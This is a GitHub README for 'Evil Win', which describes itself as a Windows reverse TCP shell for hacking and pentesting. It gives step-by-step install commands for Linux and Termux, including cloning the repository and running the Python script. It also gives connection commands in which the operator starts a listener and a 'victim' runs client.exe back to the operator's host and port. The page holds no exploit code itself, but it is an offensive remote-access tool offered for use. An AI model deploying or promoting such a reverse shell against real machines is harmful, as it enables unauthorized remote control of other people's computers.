Skip to content

Latest commit

 

History

History
34 lines (27 loc) · 880 Bytes

README.md

File metadata and controls

34 lines (27 loc) · 880 Bytes

Evil Win

Windows Reverse TCP Shell for Hacking and Pentesting

Main Window

Installation:

  • Linux:

    • sudo apt update -y
    • sudo apt install python3 python3-pip git -y
    • git clone https://github.com/i-am-unbekannt/Evil-Win
    • cd Evil-Win/
    • pip3 install -r requirements.txt
    • python3 Evil-Win.py
  • Termux:

    • pkg update -y
    • pkg install python3 python3-pip git -y
    • git clone https://github.com/i-am-unbekannt/Evil-Win
    • cd Evil-Win/
    • pip3 install -r requirements.txt
    • python3 Evil-Win.py

Set Up A Connection

  • Host: python3 Evil-win.py [HOST] [PORT]
  • Victim: client.exe [HOST] [PORT]